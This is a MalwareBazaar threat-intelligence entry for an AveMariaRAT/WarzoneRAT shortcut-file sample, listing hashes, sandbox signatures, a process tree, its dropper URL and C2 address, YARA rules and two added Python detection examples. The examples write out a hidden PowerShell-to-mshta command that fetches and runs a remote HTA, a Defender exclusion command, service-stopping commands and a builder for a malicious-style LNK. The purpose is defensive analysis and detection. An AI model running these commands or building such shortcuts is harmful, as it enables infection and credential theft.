MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



AveMariaRAT


Vendor detections: 11



SHA256 hash: 70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3
SHA3-384 hash: 40f2fdab7f9e9179601581cd77bf04e6636a5b64fb8199f553cce927ff9715bef9782fb17b74744139b4be0fa45735bd
SHA1 hash: 719fc7c6dcc473b84fe37e4e0764f97f2e924f99
MD5 hash: 714dabed81a0ad0bb12437d57365751d
humanhash: lamp-echo-paris-september
File name: Readme.txt.lnk
Signature: AveMariaRAT
File size: 5'232 bytes
First seen: 2023-10-02 16:36:28 UTC
Last seen: Never
File type: Shortcut (lnk)
MIME type: application/octet-stream
ssdeep: 12:8MMlKm/3BVSXvk44X3ojsqzKtnWNemyW+UcCsvX7CKeXRP0075vhWKDiN37+lbYH:8lp/BHYVKVWB+/CWLC7hPHarabFO
TLSH: T10FB14E181FE31714D7A3D73DACBAB311C9367C56EE528F9D019192886424111F565F2F
Reporter: abuse_ch
Tags: AveMariaRAT lnk remotes1338-hopto-org WarzoneRAT

Intelligence


File Origin
# of uploads: 1
# of downloads: 262
Origin country: NL

Vendor Threat Intelligence

Result
Verdict: Malicious
File Type: LNK File - Malicious
Payload URLs
URL: https://filebin.net/mtkpnk4x1g1cu6fj/Readme.txt.hta
File name: LNK File
Behaviour
BlacklistAPI detected
Verdict: Suspicious
Threat level: 5/10
Confidence: 100%
Tags: evasive masquerade

Result
Verdict: MALICIOUS

Result
Threat name: AveMaria, UACMe, Xmrig
Detection: malicious
Classification: rans.phis.troj.adwa.spyw.expl.evad.mine
Score: 100 / 100
Signature
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Contains functionality to check if Internet connection is working
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to hide user accounts
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Creates a thread in another existing process (thread injection)
Creates files in alternative data streams (ADS)
Creates files in the system32 config directory
Drops PE files to the document folder of the user
Drops script or batch files to the startup folder
Encrypted powershell cmdline option found
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Found URL in windows shortcut file (LNK)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential dropper URLs found in powershell memory
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Drops script at startup location
Sigma detected: Execute DLL with spoofed extension
Sigma detected: Stop multiple services
Snort IDS alert for network traffic
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses powercfg.exe to modify the power settings
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Writes to foreign memory regions
Yara detected AveMaria stealer
Yara detected UACMe UAC Bypass tool
Yara detected Xmrig cryptocurrency miner
Behaviour
Behavior Graph (ID 1318124; sample Readme.txt.lnk; start date 02/10/2023; architecture WINDOWS; score 100)

Root-level findings: DNS lookup of remotes1338.hopto.org; Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures.

Process tree with dropped files, network contacts and per-process signatures as reported (indentation shows parent/child; "..." inside a path is the report's own truncation):

powershell.exe  [Powershell drops PE file]
  conhost.exe
  mshta.exe  [Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Very long command line found; Adds a directory exclusion to Windows Defender]
    network: filebin.net 185.47.40.36:443; situla.bitbit.net 87.238.33.8:443 (REDPILL-LINPRO / Redpill Linpro, Norway)
    drops: C:\Users\user\AppData\...\Readme.txt[1].hta (HTML)
    powershell.exe  [Potential dropper URLs found in powershell memory]
      network: filebin.net; 87.238.33.7:443 (REDPILL-LINPRO / Redpill Linpro, Norway); situla.bitbit.net
      drops: C:\Users\user\AppData\...\RuntimeBroker.exe (PE32)
      notepad.exe
      conhost.exe
      RuntimeBroker.exe  [Antivirus detection for dropped file; Windows shortcut file (LNK) starts blacklisted processes; Contains functionality to hide user accounts; Machine Learning detection for dropped file]
        drops: C:\Users\user\AppData\Local\...\updater.exe (PE32); C:\Users\user\...\SecurityHealthSystray.exe (PE32+)
        powershell.exe
          conhost.exe
        updater.exe  [Antivirus detection for dropped file; Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for dropped file; 11 other signatures]
          drops: C:\Users\user\Documents\updater.exe (PE32); C:\Users\user\...\Documents:ApplicationData (PE32, alternate data stream); C:\Users\user\AppData\...\programs.bat:start (ASCII, alternate data stream); C:\Users\user\AppData\...\programs.bat (ASCII)
          powershell.exe
            conhost.exe
          updater.exe  [Antivirus detection for dropped file; Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for dropped file; 5 other signatures]
            network: remotes1338.hopto.org 172.234.51.249 (AKAMAI-ASN1EU, United States), ports 49790, 5252, 80; 127.0.0.1; 2 other IPs or domains
            drops: C:\Users\user\AppData\Roaming\akewmjqah.exe (PE32+); C:\Users\user\AppData\Local\Temp\188.exe (PE32); C:\Users\...\SecurityHealthSystray[1].exe (PE32+); 2 other files (1 malicious)
            powershell.exe
              conhost.exe
            cmd.exe
              conhost.exe
        SecurityHealthSystray.exe  [Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Modifies the hosts file; 2 other signatures]
          drops: C:\Users\user\AppData\...\upjbekjkwxxn.tmp (PE32+); C:\...\SecurityHealthSystray.exe (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII)
          dialer.exe  [Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures]
            injected into: lsass.exe [Writes to foreign memory regions]; winlogon.exe; svchost.exe; 2 other processes
      RuntimeBroker.exe  [Encrypted powershell cmdline option found]
        powershell.exe  [Contains functionality to hide user accounts]
          conhost.exe
        updater.exe
        SecurityHealthSystray.exe
SecurityHealthSystray.exe  [Windows shortcut file (LNK) starts blacklisted processes; Protects its processes via BreakOnTermination flag; Writes to foreign memory regions; 4 other signatures]
  drops: C:\Windows\Temp\upjbekjkwxxn.tmp (PE32+); C:\Windows\Temp\kvlypgvvuqhz.sys (PE32+)
cmd.exe  [Uses powercfg.exe to modify the power settings; Modifies power options to not sleep / hibernate]
  conhost.exe; sc.exe; sc.exe; 3 other processes
6 other processes  [Creates files in the system32 config directory]
  conhost.exe; conhost.exe; 14 other processes
Result
Threat name: Shortcut.Trojan.Generic
Status: Suspicious
First seen: 2023-10-02 06:01:48 UTC
File Type: Binary
AV detection: 15 of 38 (39.47%)
Threat level: 5/5

Result
Malware family: warzonerat
Score: 10/10
Tags: family:warzonerat evasion infostealer rat trojan
Behaviour
Creates scheduled task(s)
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Launches sc.exe
Checks computer location settings
Executes dropped EXE
Blocklisted process makes network request
Stops running service(s)
Warzone RAT payload
UAC bypass
WarzoneRat, AveMaria
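The behaviours reported above (Sigma hits for a script dropped at a startup location and for stopping multiple services, the Windows Defender directory exclusion, the powercfg change, the alternate data streams, the hosts-file write, the encoded PowerShell option and the powershell.exe -> mshta.exe chain) are the kind of telemetry a host-based detection keys on. The following Python is an added example written for this page, not code from MalwareBazaar or from either sandbox vendor: it runs such checks over constructed Sysmon-style events that mirror the reported process chain. The command-line switches, service names, full file paths and the encoded payload are assumptions; the page only gives the signature names, the filebin URL and the (partly truncated) drop paths.

```python
"""Host-based checks for the behaviours reported above, run over constructed
Sysmon-style events. Added example for this entry; the events are modelled on
the behaviour graph and signature list, not taken from the sandbox run."""
import base64
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "process" (process creation) or "file" (file write)
    image: str         # image path of the acting process
    cmdline: str = ""  # command line (process events)
    parent: str = ""   # parent image (process events)
    target: str = ""   # path written; may end in ":stream" for an ADS (file events)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
HTA_URL = "https://filebin.net/mtkpnk4x1g1cu6fj/Readme.txt.hta"   # from the report
STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
UPDATER = r"C:\Users\user\AppData\Local\Temp\updater.exe"        # assumed full drop path
ENC = base64.b64encode("Start-Sleep 1".encode("utf-16le")).decode()  # assumed -enc payload

EVENTS = [  # constructed; switches, service names and paths are assumptions
    Event("process", PS, f'powershell -w hidden -c "mshta {HTA_URL}"', r"C:\Windows\explorer.exe"),
    Event("process", MSHTA, f"mshta {HTA_URL}", PS),
    Event("process", PS, 'powershell -Command "Add-MpPreference -ExclusionPath '
          r'C:\Users\user\AppData\Roaming"', MSHTA),
    Event("process", PS, f"powershell -enc {ENC}", r"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"),
    Event("process", r"C:\Windows\System32\sc.exe", "sc stop wuauserv", CMD),
    Event("process", r"C:\Windows\System32\sc.exe", "sc stop bits", CMD),
    Event("process", r"C:\Windows\System32\powercfg.exe", "powercfg /x -standby-timeout-ac 0", CMD),
    Event("file", UPDATER, target=STARTUP + r"\programs.bat"),
    Event("file", UPDATER, target=STARTUP + r"\programs.bat:start"),
    Event("file", UPDATER, target=r"C:\Users\user\Documents:ApplicationData"),
    Event("file", r"C:\Users\user\AppData\Local\SecurityHealthSystray.exe",
          target=r"C:\Windows\System32\drivers\etc\hosts"),
    Event("file", r"C:\Windows\explorer.exe",            # benign ADS: must not fire
          target=r"C:\Users\user\Downloads\report.pdf:Zone.Identifier"),
]

SC_STOP = re.compile(r"\bsc(?:\.exe)?\"?\s+stop\s+(\S+)", re.I)
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe
ENC_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
STREAM = re.compile(r"^([A-Za-z]:\\.*?)(?::([^\\:]+))?$")
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta", ".lnk")


def split_stream(path):
    """Split 'C:\\dir\\file:stream' into (file path, stream name or None)."""
    m = STREAM.match(path)
    return (m.group(1), m.group(2)) if m else (path, None)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, actor, detail) hits for the reported behaviours."""
    hits = []
    sc_stops = {}  # parent image -> distinct services it stopped through sc.exe
    for e in events:
        img = basename(e.image)
        if e.kind == "process":
            cl, low = e.cmdline, e.cmdline.lower()
            if img == "mshta.exe" and "://" in low:
                hits.append(("mshta_remote_hta", e.image, cl))
            if img == "mshta.exe" and basename(e.parent) == "powershell.exe":
                hits.append(("mshta_spawned_by_powershell", e.image, e.parent))
            if img in ("powershell.exe", "pwsh.exe"):
                if "add-mppreference" in low and "exclusion" in low:
                    hits.append(("defender_exclusion_added", e.image, cl))
                if ENC_FLAG.search(cl):
                    hits.append(("encoded_powershell", e.image, cl))
            if img == "powercfg.exe" and re.search(r"\s[/-](?:x|change|h)\b", low):
                hits.append(("powercfg_power_settings_changed", e.image, cl))
            m = SC_STOP.search(cl)
            if img == "sc.exe" and m:
                sc_stops.setdefault(e.parent, set()).add(m.group(1).lower())
        else:
            base, stream = split_stream(e.target)
            low = base.lower()
            if "\\start menu\\programs\\startup\\" in low and low.endswith(SCRIPT_EXT):
                hits.append(("script_dropped_to_startup", e.image, e.target))
            if stream and stream.lower() != "zone.identifier":   # MotW stream is normal
                hits.append(("alternate_data_stream_written", e.image, e.target))
            if low.endswith("\\drivers\\etc\\hosts"):
                hits.append(("hosts_file_modified", e.image, e.target))
    for parent, services in sc_stops.items():
        if len(services) >= 2:  # threshold assumed for the Sigma "Stop multiple services" idea
            hits.append(("multiple_services_stopped", parent, ", ".join(sorted(services))))
    return hits


if __name__ == "__main__":
    for rule, actor, detail in detect(EVENTS):
        print(f"{rule:32} {actor}  <-  {detail}")
```

The ADS check deliberately ignores Zone.Identifier, otherwise every browser download would fire; the sample's `programs.bat:start` and `Documents:ApplicationData` streams still do. The service-stop rule aggregates per parent rather than per event, which is what makes "multiple" meaningful.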
Malware Config
C2 Extraction: remotes1338.hopto.org:5252
Dropper Extraction: https://filebin.net/mtkpnk4x1g1cu6fj/Readme.txt.hta
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Download_in_LNK
Author: @bartblaze
Description: Identifies download artefacts in shortcut (LNK) files.

Rule name: EXE_in_LNK
Author: @bartblaze
Description: Identifies executable artefacts in shortcut (LNK) files.

Rule name: Long_RelativePath_LNK
Author: @bartblaze
Description: Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.

Rule name: PS_in_LNK
Author: @bartblaze
Description: Identifies PowerShell artefacts in shortcut (LNK) files.

Rule name: Script_in_LNK
Author: @bartblaze
Description: Identifies scripting artefacts in shortcut (LNK) files.
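The five rules above all key on the StringData section of the shortcut (the name, relative path, working directory, arguments and icon location that follow the 76-byte ShellLinkHeader): a URL, an executable name, a PowerShell or script-host invocation, or an unusually long relative path. The following Python is an added example written for this page, not MalwareBazaar's code and not @bartblaze's rule logic: it parses that structure, runs equivalent checks, and flags the double-extension file name reported above. The LNK it builds is a constructed stand-in for the sample: the filebin URL and the powershell.exe -> mshta.exe chain come from the report, while the switches, the 40-hop relative path, the working directory, the icon path and the 100-character length threshold are assumptions.

```python
"""Minimal Shell Link (.lnk) reader with the checks the LNK YARA rules above are
after. Added example for this entry, not code from MalwareBazaar or @bartblaze.
The sample LNK built at the bottom is constructed: the URL and the powershell ->
mshta chain come from the report, the exact switches and paths are assumed."""
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]
SW_SHOWMINNOACTIVE = 7          # ShowCommand that keeps the launched window out of sight


def build_lnk(strings, unicode=True):
    """76-byte ShellLinkHeader followed by StringData; no IDList or LinkInfo."""
    flags = IS_UNICODE if unicode else 0
    body = b""
    for flag, key in STRING_FIELDS:
        if key in strings:
            flags |= flag
            s = strings[key]
            body += struct.pack("<H", len(s))           # CountCharacters, not bytes
            body += s.encode("utf-16le") if unicode else s.encode("cp1252")
    header = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le
    header += struct.pack("<II", flags, 0x20)           # LinkFlags, FileAttributes (ARCHIVE)
    header += b"\0" * 24                                 # Creation/Access/Write FILETIMEs
    header += struct.pack("<IiIHHII", 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    return header + body                                 # FileSize .. Reserved3 above


def parse_lnk(data):
    """Return header fields plus StringData, skipping LinkTargetIDList and LinkInfo."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if uuid.UUID(bytes_le=bytes(data[4:20])) != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:                  # IDListSize (u16) precedes the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    width, enc = (2, "utf-16le") if flags & IS_UNICODE else (1, "cp1252")
    for flag, key in STRING_FIELDS:          # CountCharacters (u16) then the characters
        if flags & flag:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            info[key] = data[pos:pos + n * width].decode(enc)
            pos += n * width
    return info


URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
LOLBINS = ("powershell", "pwsh", "mshta", "cmd", "wscript", "cscript", "rundll32",
           "regsvr32", "certutil", "bitsadmin", "curl")


def lnk_indicators(data):
    """Download/EXE/PS/Script/Long_RelativePath-style checks over the StringData."""
    info = parse_lnk(data)
    text = " ".join(info.get(key, "") for _, key in STRING_FIELDS)
    return info, {
        "urls": URL_RE.findall(text),
        "lolbins": sorted(b for b in LOLBINS if re.search(rf"\b{b}(?:\.exe)?\b", text, re.I)),
        "hidden_window": info["show_command"] == SW_SHOWMINNOACTIVE,
        "long_relative_path": len(info.get("relative_path", "")) > 100,  # threshold assumed
    }


def is_double_extension(filename):
    """Readme.txt.lnk-style names: a document extension in front of the real .lnk."""
    return re.search(r"\.(?:txt|pdf|docx?|xlsx?|jpe?g|png|html?)\.lnk$", filename, re.I) is not None


# Constructed stand-in for the sample; 40 "..\" hops bury the real target in a long relative path.
SAMPLE_LNK = build_lnk({
    "relative_path": "..\\" * 40 + r"Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "working_dir": r"C:\Windows\System32",
    "arguments": '-w hidden -c "mshta https://filebin.net/mtkpnk4x1g1cu6fj/Readme.txt.hta"',
    "icon_location": r"%SystemRoot%\System32\notepad.exe",
})

if __name__ == "__main__":
    info, hits = lnk_indicators(SAMPLE_LNK)
    print(info["arguments"])
    print(hits)
```

Skipping LinkTargetIDList and LinkInfo by their own size fields is what lets the StringData be reached on real shortcuts, which almost always carry both; the builder omits them, so those two branches are only exercised when you feed the parser a shortcut pulled from a mailbox or a sandbox. Counting characters rather than bytes when reading each string is the usual mistake in home-grown LNK parsers and the reason the ANSI/Unicode width is carried explicitly.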

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malspam
AveMariaRAT
Shortcut (lnk) 70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3 (this sample)
Delivery method: Distributed via e-mail attachment

Comments